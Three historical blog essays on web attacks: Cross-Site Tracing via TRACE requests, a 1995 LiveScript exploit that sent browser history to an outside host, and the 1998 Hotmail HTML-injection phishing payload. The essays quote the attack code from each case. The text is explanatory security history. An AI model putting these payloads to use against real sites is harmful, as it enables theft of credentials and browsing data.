• In January 2003 Jeremiah Grossman disclosed a method to bypass the HttpOnly1 cookie restriction. He named it Cross-Site Tracing (XST), unwittingly starting a trend to attach “cross-site” to as many web-related vulnerabilities as possible.

    Alas, the “XS” in XST evokes similarity to XSS (Cross-Site Scripting) which has the consequence of leading people to mistake XST as a method for injecting JavaScript. (Thankfully, character encoding attacks have avoided the term Cross-Site Unicode, XSU.) Although XST attacks rely on browser scripting to exploit the flaw, the underlying problem is not the injection of JavaScript. XST is a means for accessing headers normally restricted from JavaScript.

    Confused yet?

    First, let’s review XSS. These vulns, alternately described as HTML injection, occur because a web application echoes an attacker’s payload within the HTTP response body – the HTML. This enables the attacker to modify a page’s DOM by injecting characters that affect the HTML’s layout, such as adding spurious characters like brackets (< and >) and quotes (' and ").

    Cross-site tracing relies on HTML injection to craft an exploit within the victim’s browser, but this implies that an attacker already has the capability to execute JavaScript. So, XST isn’t about injecting <script> tags into the browser. The attacker must already be able to do that.

    Cross-site tracing takes advantage of the fact that a web server should reflect the client’s HTTP message in its respose.2 The common misunderstanding of an XST attack’s goal is that it uses a TRACE request to cause the server to reflect JavaScript in the HTTP response body that the browser would consequently execute. As the following example shows, this is in fact what happens even though the reflection of JavaScript isn’t the real vulnerability. The green and red text indicates the response body. The request was made with netcat.

    Cross-site tracing

    The reflection of <script> tags is immaterial (the RFC even says the server should reflect the request without modification). The real outcome of an XST attack is that it exposes HTTP headers normally inaccessible to JavaScript.

    To reiterate: XST attacks use the TRACE (or synonymous TRACK) method to read HTTP headers that are otherwise blocked from JavaScript access.

    For example, the HttpOnly attribute of a cookie prevents JavaScript from reading that cookie’s properties. The Authentication header, which for HTTP Basic Auth is simply the Base64-encoded username and password, is not part of the DOM and not directly readable by JavaScript.

    No cookie values or auth headers showed up when we made the example request via netcat because we didn’t include any. Netcat doesn’t have the internal state or default headers that a browser does. For comparison, take a look at the server’s response when a browser’s XHR object makes a TRACE request. This is the snippet of JavaScript:

    var xhr = new XMLHttpRequest();
    xhr.open('TRACE', 'https://test.lab/', false);
    xhr.send(null);
    if(200 == xhr.status)
        alert(xhr.responseText);
    

    The following image shows one possible response. (In this scenario, we’ve imagined a site for which the browser has some prior context, including cookies and a login with HTTP Basic Auth.) Notice the text in red. The browser included the Authorization and Cookie headers to the XHR request, which have been reflected by the server:

    XST headers

    Now we see that both an HTTP Basic Authentication header and a cookie value appear in the response text. A simple JavaScript regex could extract these values, bypassing the normal restrictions imposed on script access to headers or protected cookies. The drawback for attackers is that modern browsers (such as the ones that have moved into this decade) are savvy enough to block TRACE requests through the XMLHttpRequest object, which leaves the attacker to look for alternate capabilities in plug-ins like Flash (which are also now gone from modern browsers).

    This is the real vulnerability associated with cross-site tracing: peeking at header values. The exploit would be impossible without the ability to inject JavaScript in the first place3. Therefore, its real impact (or threat, depending on how you define these terms) is exposing sensitive header data. Hence, alternate names for XST could be TRACE disclosure, TRACE header reflection, TRACE method injection (TMI), or TRACE header & cookie (THC) attack.

    We’ll see if any of those actually catch on for the next OWASP Top 10 list.


    1. HttpOnly was introduced by Microsoft in Internet Explorer 6 Service Pack 1, which was released September 9, 2002. It was created to mitigate, not block, XSS exploits that explicitly attacked cookie values. It wasn’t a method for preventing html injection (aka cross-site scripting or XSS) vulnerabilities from occurring in the first place. Mozilla magnanimously adopted in it FireFox 2.0.0.5 four and a half years later. 

    2. Section 9.8 of the HTTP/1.1 RFC

    3. Security always has nuance. Requesting TRACE /<script>alert(42)</script> HTTP/1.0 will likely be stored in a traffic log file. If some log parsing tool renders requests like this to a web page without filtering the content, then HTML injection once again becomes possible. This is often referred to as second order XSS – when a payload is injected via one application, stored, then rendered by a separate one. 

    • • •
  • The Hacking Web Apps book covers HTML Injection and cross-site scripting (XSS) in Chapter 2. Within the restricted confines of the allotted page count, it describes one of the most pervasive attacks that plagues modern web applications.

    Yet XSS is old. Very, very old. Born in the age of acoustic modems and barely a blink after the creation of the web browser.

    Early descriptions of the attack used terms like “malicious HTML” or “malicious JavaScript” before the phrase “cross-site scripting” became canonized by the OWASP Top 10. While XSS is an easy point of reference, the attack could be more generally called HTML injection because an attack does not have to “cross sites” or rely on JavaScript to be successful. The infamous Samy attack didn’t need to leave the confines of MySpace (nor did it need to access cookies) to effectively DoS the site within 24 hours. Persistent XSS may be just as dangerous if an attacker injects an iframe to a malware site – no JavaScript required.

    Here’s one of the earliest references to the threat of XSS from a message to the comp.sys.acorn.misc newsgroup on June 30, 19961. It mentions only a handful of possible outcomes:

    Another ‘application’ of JavaScript is to poke holes in Netscape’s security. To anyone using old versions of Netscape before 2.01 (including the beta versions) you can be at risk to malicious Javascript pages which can a) nick your history b) nick your email address c) download malicious files into your cache and run them (although you need to be coerced into pressing the button) d) examine your filetree.

    From that message we can go back several months to the announcement of Netscape Navigator 2.0 on September 18, 1995. A month later Netscape created a “Bugs Bounty” starting with its beta release in October. The bounty offered rewards, including a $1,000 first prize, to anyone who discovered and disclosed a security bug within the browser. A few weeks later the results were announced and first prize went to a nascent JavaScript hack.

    The winner of the bug hunt, Scott Weston, posted his find to an Aussie newsgroup. This was almost 15 years ago on December 1, 1995 (note that LiveScript was the precursor to JavaScript):

    The “LiveScript” that I wrote extracts ALL the history of the current netscape window. By history I mean ALL the pages that you have visited to get to my page, it then generates a string of these and forces the Netscape client to load a URL that is a CGI script with the QUERY_STRING set to the users History. The CGI script then adds this information to a log file.

    Scott, faithful to hackerdom tenets, included a pop-culture reference2 in his description of the sensitive data extracted about the unwitting victim:

    - the URL to use to get into CD-NOW as Johnny Mnemonic, including username and password.

    - The exact search params he used on Lycos (i.e. exactly what he searched for)

    - plus any other places he happened to visit.

    HTML injection targets insecure web applications. These were examples of how a successful attack could harm the victim rather than how a web site was hacked. Browser security is important to mitigate the impact of such attacks, but a browser’s fundamental purpose is to parse and execute HTML and JavaScript returned by a web application – a dangerous prospect when the page is laced with malicious content inserted by an attacker.

    The attack is almost indistinguishable from a modern payload. A real attack might only have used a more subtle <img> or <iframe> as opposed to changing the location.href:

    <SCRIPT LANGUAGE="LiveScript">
    i = 0
    yourHistory = ""
    while (i < history.length) {
      yourHistory += history[i]
      i++;
      if (i < history.length)
        yourHistory += "^"
      }
      location.href = "http://www.tripleg.com.au/cgi-bin/scott/his?" + yourHistory
      <!-- hahah here is the hidden script -->
    </SCRIPT>
    

    The actual exploit reflected the absurd simplicity typical of XSS attacks. They often require little effort to create, but carry a significant impact.

    Before closing let’s take a tangential look at the original $1,000 “Bugs Bounty”. The Chromium team offers $500 and $1,3373 rewards for security-related bugs. The Mozilla Foundation offers $500 and a T-Shirt.

    (In 2023, these amounts reach even higher into the $20,000 and $40,000 range.)

    On the other hand, you can keep the security bug from the browser developers and earn $10,000 and a laptop for a nice, working exploit.

    Come to think of it, those options seem like a superior hourly rate to writing a book.


    1. Netscape Navigator 3.0 was already available in April of the same year. 

    2. Good luck tracking down the May 1981 issue of Omni Magazine in which William Gibson’s short story first appeared! 

    3. No, the extra $337 isn’t the adjustment for inflation from 1995, which would have made it $1,407.72 according to the Bureau of Labor and Statistics. It’s a nod to leetspeak. 

    • • •
  • My book starts off with a discussion of cross-site scripting (XSS) attacks along with examples from 2009 that illustrate the simplicity of these attacks and the significant impact they can have. What’s astonishing is how little many of the attacks have changed.

    Consider the following example, over a decade old, of HTML injection before the term XSS became so ubiquitous. The exploit also appeared about two years before the blanket CERT advisory that called attention to insecurity of unchecked HTML (CA-2000-02).

    On August 24, 1998 a Canadian web developer, Tom Cervenka, posted a message to the comp.lang.javascript newsgroup that claimed:

    We have just found a serious security hole in Microsoft’s Hotmail service (https://www.hotmail.com/) which allows malicious users to easily steal the passwords of Hotmail users.

    The exploit involves sending an e-mail message that contains embedded javascript code. When a Hotmail user views the message, the javascript code forces the user to re-login to Hotmail. In doing so, the victim’s username and password is sent to the malicious user by e-mail.

    Hotmail spoof

    The discoverers flouted the 90s trend to name vulns based on expletives or num3r1c characters and dubbed it simply the “Hot”Mail Exploit.

    (Disclosures of that era also tended to include greetz, typos, and self-aggrandizement that impressed upon the reader the hacker’s near-omnipotent skills. This disclosure failed on most of those aspects. However, the web site demo satisfied an Axiom of Hacking Culture by choosing a hacker handle that referenced pop culture, Blue Adept, a fantasy novel by Piers Anthony.)

    The attack required two steps. First, they set up a page on Geocities (a hosting service for web pages distinguished by being free before free was subsumed by the Web 2.0 label) that spoofed Hotmail’s login.

    The attack wasn’t particularly sophisticated; it didn’t need to be. The login form collected the victim’s credentials and IP address, then mailed them to the newly-created Geocities account.

    The second step involved executing the actual exploit against Hotmail by sending an email with HTML that contained a rather curious img tag. (Whitespace added for readability of the long, double-quoted string.):

    <img src="javascript:errurl='http://www.because-we-can.com/users/anon/hotmail/getmsg.htm';
    nomenulinks=top.submenu.document.links.length;
    for(i=0;i<nomenulinks-1;i++){
      top.submenu.document.links[i].target='work';
      top.submenu.document.links[i].href=errurl;
    }
    noworklinks=top.work.document.links.length;
    for(i=0;i<noworklinks-1;i++){
      top.work.document.links[i].target='work';
      top.work.document.links[i].href=errurl;
    }">
    

    The JavaScript changed the browser’s DOM such that any click would take the victim to the spoofed login page at which point it would coax credentials from an unwitting visitor. The original payload didn’t bother to obfuscate the JavaScript inside the src attribute. Modern attacks might have more sophisticated obfuscation techniques and use tags other than the img element, but it’s otherwise hard to distinguish what decade this payload is from.

    The problem of HTML injection, well known for over 10 years, remains a significant attack against web applications. (Another edit from the future: XSS remains a common vuln now almost 25 years after this disclosure.)

    • • •